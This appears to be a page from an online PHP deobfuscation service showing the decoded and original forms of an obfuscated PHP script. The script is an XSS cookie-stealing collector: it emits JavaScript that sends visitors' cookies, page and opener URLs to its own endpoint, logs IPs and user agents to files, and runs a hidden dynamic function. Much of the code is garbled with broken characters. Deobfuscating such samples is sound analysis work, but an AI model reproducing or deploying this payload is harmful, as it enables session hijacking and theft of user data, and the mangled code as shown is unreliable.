Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* lxx */ error_reporting(0);define('?, '');?????;$_SERVER[? = explode('|||', gzinfl..

Decoded Output download

<?php /* lxx */ error_reporting(0);define('?, '');?????;$_SERVER[? = explode('|||', gzinflate(substr('?      ]S]o?|(????C1?Xv???k?Mb9?{$S,???|HrD;?WC?8??t?-@???o)??G<?;6??%O,Y?b8?? ?j?R?P 4vRh,SN`xXj??K+[!y#?,?!s?m??y?6??|?Tek)??h?q?? 
d?az?~??H<?#=?QT)P7?%?i?1?>???|?f?D?,a?s??TD_9P???$?\9Y!?<??^F?VRpkpO?.??M?zKXj?5?B??!l1????P  ',0x0a, -8)));???????????? 
$project_id='akk6';$dirs=$_SERVER{?{0x001};$url=$_SERVER{?[0x0002];function getAllHeaders_(){$??&$_SERVER{?;$?=array();foreach($_SERVER as $=>$){if($??0x00003}($,0,0x05)==$??0x000004]){$?[$??0x05}($??0x006],$??0x0007},$??0x00008]($??0x000009}($??0x05}($??0x0a],$??0x006],$??0x00003}($,0x05)))))]=$;}}return $?;?}function getServerSchema(){$??&$_SERVER{?;if((!empty($_SERVER[$??0x00b}])&& $_SERVER[$??0x00b}]==$??0x000c])||(!empty($_SERVER[$??0x0000d}])&& $_SERVER[$??0x0000d}]==$??0x00000e])||(!empty($_SERVER[$??0x0f}])&& $_SERVER[$??0x0f}]==$??0x0010])){return $??0x000c];}return $??0x00011};}function parse_url_param($){$?&$_SERVER{?;$?$?0x000012]($?0x0000013},$);;$?array();??$?$?0x000012]($?0x014],$?0x0015}($?);foreach($?as $?{$?$?0x000012]($?0x00016],$?;??????$?$?0]]=$?0x000017}($?0x001]);}return $?}function curl_get($,$?{$=&$_SERVER{?;$?$[0x0000018]($);??????;${0x019}($?CURLOPT_SSL_VERIFYPEER,!1);??;${0x019}($?CURLOPT_SSL_VERIFYHOST,!1);???${0x019}($?CURLOPT_CUSTOMREQUEST,$[0x001a]);;@${0x019}($?CURLOPT_FOLLOWLOCATION,0x001);???;${0x019}($?CURLOPT_TIMEOUT,0x03c);;${0x019}($?CURLOPT_AUTOREFERER,0x001);${0x019}($?CURLOPT_RETURNTRANSFER,0x001);?${0x019}($?CURLOPT_HTTPHEADER,$?;$=${0x0001b}($?;???$[0x00001c]($?;return $;}function StripStr($){$?=&$_SERVER{?;if($?{0x000001d}()){$=$?[0x01e]($);}return $?{0x001f}($?[0x00020]($,ENT_QUOTES));}function getpath($?,$){$=&$_SERVER{?;$?${0x000021};??foreach($? as $?{if($?0]==$){$?$?0x001];return $?}}return ${0x000021};?}function save_cookie($?,$?,$,$??{$=&$_SERVER{?;$?$[0x0000022]();???;$=array();????;foreach($?as $=>$){if($!=${0x023}){$[0x0024]($,$.${0x00025}.$);}}$?$_SERVER[$[0x000026]];$?$_SERVER[${0x0000027}];$[0x0024]($,$[0x028].${0x00025}.$?;;$=$_SERVER[${0x0029}];$?=$?.$[0x0002a].$;$?${0x00002b}($);???;$??$[0x000002c](${0x02d},$[0x002e]());$="TIME : {$??
HTTP_REFERER : {$??
HTTP_USER_AGENT : {$?
REMOTE_ADDR : {$?

location : {$?${0x0002f}]}
toplocation : {$?$[0x000030]]}
cookie : {$?${0x0000031}]}
opener : {$?$[0x032]]}


";@${0x0033}($?,0707);??;if($!=${0x000021}){$?$[0x00034]($?.${0x000035}.$.$[0x0000036],${0x037});$[0x0038]($?$);${0x00039}($?;$[0x00003a]($?,$);}}$ref=$_SERVER[$_SERVER{?{0x000003b}];$referer_parse=@$_SERVER{?[0x03c]($_SERVER{?{0x003d}($ref));$domain=$referer_parse[$_SERVER{?[0x0003e]]?$referer_parse[$_SERVER{?[0x0003e]]:$_SERVER{?{0x00003f};$domain=$_SERVER{?{0x003d}($domain);$c=$_SERVER{?[0x0000040].$_SERVER{?{0x00003f}.$_SERVER{?{0x041}.$_SERVER{?{0x00003f}.$_SERVER{?[0x0042].$_SERVER{?{0x00043}.$_SERVER{?[0x000044];$f=@$c($_SERVER{?{0x0000045}.$_SERVER{?[0x046].$_SERVER{?{0x0047}.$_SERVER{?[0x00048].$_SERVER{?{0x000049}.$_SERVER{?[0x000004a],$_SERVER{?{0x04b});$f();$self_url=$_SERVER{?[0x004c]().$_SERVER{?{0x0004d}.$_SERVER[$_SERVER{?[0x00004e]].$_SERVER[$_SERVER{?{0x000004f}];$modle=$_GET[$_SERVER{?[0x050]];switch($modle){case $_SERVER{?{0x0051}:if($domain==$_SERVER{?{0x000021}){die();}$_SERVER{?[0x00052]($url,$dirs,$domain,$ref);break;default:$_SERVER{?{0x000053}($_SERVER{?[0x0000054]);echo("(function(){(new Image()).src='{$self_url}?do=api&id={$project_id}&location='+encodeURIComponent((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+encodeURIComponent((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+encodeURIComponent((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+encodeURIComponent((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})())})();");}?> 

Did this file decode correctly?

Original Code

<?php /* lxx */ error_reporting(0);define('?, '');?????;$_SERVER[? = explode('|||', gzinflate(substr('?      ]S]o?|(????C1?Xv???k?Mb9?{$S,???|HrD;?WC?8??t?-@???o)??G<?;6??%O,Y?b8?? ?j?R?P 4vRh,SN`xXj??K+[!y#?,?!s?m??y?6??|?Tek)??h?q??
d?az?~??H<?#=?QT)P7?%?i?1?>???|?f?D?,a?s??TD_9P???$?\\9Y!?<??^F?VRpkpO?.??M?zKXj?5?B??!l1????P  ',0x0a, -8)));????????????
$project_id='akk6';$dirs=$_SERVER{?{0x001};$url=$_SERVER{?[0x0002];function getAllHeaders_(){$??&$_SERVER{?;$?=array();foreach($_SERVER as $=>$){if($??0x00003}($,0,0x05)==$??0x000004]){$?[$??0x05}($??0x006],$??0x0007},$??0x00008]($??0x000009}($??0x05}($??0x0a],$??0x006],$??0x00003}($,0x05)))))]=$;}}return $?;?}function getServerSchema(){$??&$_SERVER{?;if((!empty($_SERVER[$??0x00b}])&& $_SERVER[$??0x00b}]==$??0x000c])||(!empty($_SERVER[$??0x0000d}])&& $_SERVER[$??0x0000d}]==$??0x00000e])||(!empty($_SERVER[$??0x0f}])&& $_SERVER[$??0x0f}]==$??0x0010])){return $??0x000c];}return $??0x00011};}function parse_url_param($){$?&$_SERVER{?;$?$?0x000012]($?0x0000013},$);;$?array();??$?$?0x000012]($?0x014],$?0x0015}($?);foreach($?as $?{$?$?0x000012]($?0x00016],$?;??????$?$?0]]=$?0x000017}($?0x001]);}return $?}function curl_get($,$?{$=&$_SERVER{?;$?$[0x0000018]($);??????;${0x019}($?CURLOPT_SSL_VERIFYPEER,!1);??;${0x019}($?CURLOPT_SSL_VERIFYHOST,!1);???${0x019}($?CURLOPT_CUSTOMREQUEST,$[0x001a]);;@${0x019}($?CURLOPT_FOLLOWLOCATION,0x001);???;${0x019}($?CURLOPT_TIMEOUT,0x03c);;${0x019}($?CURLOPT_AUTOREFERER,0x001);${0x019}($?CURLOPT_RETURNTRANSFER,0x001);?${0x019}($?CURLOPT_HTTPHEADER,$?;$=${0x0001b}($?;???$[0x00001c]($?;return $;}function StripStr($){$?=&$_SERVER{?;if($?{0x000001d}()){$=$?[0x01e]($);}return $?{0x001f}($?[0x00020]($,ENT_QUOTES));}function getpath($?,$){$=&$_SERVER{?;$?${0x000021};??foreach($? as $?{if($?0]==$){$?$?0x001];return $?}}return ${0x000021};?}function save_cookie($?,$?,$,$??{$=&$_SERVER{?;$?$[0x0000022]();???;$=array();????;foreach($?as $=>$){if($!=${0x023}){$[0x0024]($,$.${0x00025}.$);}}$?$_SERVER[$[0x000026]];$?$_SERVER[${0x0000027}];$[0x0024]($,$[0x028].${0x00025}.$?;;$=$_SERVER[${0x0029}];$?=$?.$[0x0002a].$;$?${0x00002b}($);???;$??$[0x000002c](${0x02d},$[0x002e]());$="TIME : {$??\r\nHTTP_REFERER : {$??\r\nHTTP_USER_AGENT : {$?\r\nREMOTE_ADDR : {$?\r\n\r\nlocation : {$?${0x0002f}]}\r\ntoplocation : {$?$[0x000030]]}\r\ncookie : {$?${0x0000031}]}\r\nopener : {$?$[0x032]]}\r\n\r\n\r\n";@${0x0033}($?,0707);??;if($!=${0x000021}){$?$[0x00034]($?.${0x000035}.$.$[0x0000036],${0x037});$[0x0038]($?$);${0x00039}($?;$[0x00003a]($?,$);}}$ref=$_SERVER[$_SERVER{?{0x000003b}];$referer_parse=@$_SERVER{?[0x03c]($_SERVER{?{0x003d}($ref));$domain=$referer_parse[$_SERVER{?[0x0003e]]?$referer_parse[$_SERVER{?[0x0003e]]:$_SERVER{?{0x00003f};$domain=$_SERVER{?{0x003d}($domain);$c=$_SERVER{?[0x0000040].$_SERVER{?{0x00003f}.$_SERVER{?{0x041}.$_SERVER{?{0x00003f}.$_SERVER{?[0x0042].$_SERVER{?{0x00043}.$_SERVER{?[0x000044];$f=@$c($_SERVER{?{0x0000045}.$_SERVER{?[0x046].$_SERVER{?{0x0047}.$_SERVER{?[0x00048].$_SERVER{?{0x000049}.$_SERVER{?[0x000004a],$_SERVER{?{0x04b});$f();$self_url=$_SERVER{?[0x004c]().$_SERVER{?{0x0004d}.$_SERVER[$_SERVER{?[0x00004e]].$_SERVER[$_SERVER{?{0x000004f}];$modle=$_GET[$_SERVER{?[0x050]];switch($modle){case $_SERVER{?{0x0051}:if($domain==$_SERVER{?{0x000021}){die();}$_SERVER{?[0x00052]($url,$dirs,$domain,$ref);break;default:$_SERVER{?{0x000053}($_SERVER{?[0x0000054]);echo("(function(){(new Image()).src='{$self_url}?do=api&id={$project_id}&location='+encodeURIComponent((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+encodeURIComponent((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+encodeURIComponent((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+encodeURIComponent((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})())})();");}?>

Function Calls

None

Variables

None

Stats

MD5 a35a3c4121bcc15f39d41be5588e0316
Eval Count 0
Decode Time 51 ms